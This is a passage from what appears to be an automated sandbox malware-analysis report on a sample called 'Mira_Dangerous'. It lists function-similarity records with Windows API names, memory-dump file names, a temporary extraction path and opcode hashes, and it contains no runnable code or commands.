    • Part of subcall function 00007FF7A8CC7F04: CharNextA.USER32 ref: 00007FF7A8CC8065
  • MessageBoxA.USER32 ref: 00007FF7A8CC3EF3
    • Part of subcall function 00007FF7A8CC7E34: EnumResourceLanguagesA.KERNEL32 ref: 00007FF7A8CC7E8C
    • Part of subcall function 00007FF7A8CC7E34: EnumResourceLanguagesA.KERNEL32 ref: 00007FF7A8CC7ECA
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
  • String ID: Mira
  • API String ID: 2312377310-679536105
  • Opcode ID: 863b2b2085453d1b908c50441a0eaeb3b9e2f95aa7a0fcc7b82c6bcc3126a943
  • Instruction ID: 50ee7d8f3fa9250ba9ccc88793ca2a95894167a3497af9bb4f84f3f6dbc189c7
  • Opcode Fuzzy Hash: 863b2b2085453d1b908c50441a0eaeb3b9e2f95aa7a0fcc7b82c6bcc3126a943
  • Instruction Fuzzy Hash: 00A1A8B2E1B14286F760AF25A44467BF664FF44754F9321B9E90D872A0CE3DE845CF28
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: File$CloseCreateHandleWrite
  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
  • API String ID: 1065093856-2312194364
  • Opcode ID: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
  • Instruction ID: a095456c3ee46ff799ff454488039334406548df50c36cf0fb40121166dced24
  • Opcode Fuzzy Hash: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
  • Instruction Fuzzy Hash: A831D2B260968186EB60AF14E4407BAF760FB89BA4F855274DB9D477A4CF7CD408CF24
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID:
  • String ID: *MEMCAB
  • API String ID: 0-3211172518
  • Opcode ID: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
  • Instruction ID: 5bf70faf4ced32100706c07ee8cea6e0997aeb65235ae388d7c5902db18d3bc7
  • Opcode Fuzzy Hash: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
  • Instruction Fuzzy Hash: 51314AB1A0AB4285EB50AB11E4483B9F7A0BB44791FC66276D55C423B0EF3CE489CF24
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
  • String ID:
  • API String ID: 140117192-0
  • Opcode ID: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
  • Instruction ID: 1ce37870135c58ad70c76af6b988da2ef1b50825ca60aead9965d316e89ea36d
  • Opcode Fuzzy Hash: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
  • Instruction Fuzzy Hash: 1141E6B5A0AB0181EB50EB18F890366F364FB88744F926176DA8D82774DF3CE159DB24
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Resource$DialogFindFreeIndirectLoadParam
  • String ID:
  • API String ID: 1214682469-0
  • Opcode ID: 99feb220bc4d7b18b994646d80799ee091b3782a70530dd697189ae1540c7553
  • Instruction ID: ab4290b57b4d52894cefd446244f4d0c6da0589972beb3ccfa0b825aae8d76cc
  • Opcode Fuzzy Hash: 99feb220bc4d7b18b994646d80799ee091b3782a70530dd697189ae1540c7553
  • Instruction Fuzzy Hash: 39115171A09B4186EA109B15F450279FA60FB49FE1F895774DE5D07BA4DF3CD4408B18
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: Char$Prev$Next
  • String ID:
  • API String ID: 3260447230-0
  • Opcode ID: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
  • Instruction ID: ac7408e1f59e0d2a1e8837d6bbd0105a770f3669166e3ab591282499efaf3f1a
  • Opcode Fuzzy Hash: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
  • Instruction Fuzzy Hash: 8A11CAA2E0AA9285FB511B25B500179EFA1E74DFE0F8AA3B0DA5F03794CF3CD4408B14
Memory Dump Source
  • Source File: 00000000.00000002.1238717559.00007FF7A8CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A8CC0000, based on PE: true
  • Associated: 00000000.00000002.1238704677.00007FF7A8CC0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238731275.00007FF7A8CC9000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238749187.00007FF7A8CCC000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1238763219.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff7a8cc0000_Mira_Dangerous.jbxd
Similarity
  • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
  • String ID:
  • API String ID: 140117192-0
  • Opcode ID: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
  • Instruction ID: e9d5af0d013f69fe05184b611cb4149576c9f742cad34aff08d22e4bcf15fc7d
  • Opcode Fuzzy Hash: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
  • Instruction Fuzzy Hash: E721F5B591AB4181E700AB04F8803A6F3A4FB84744F912076DA8D43774DF3CD059DB28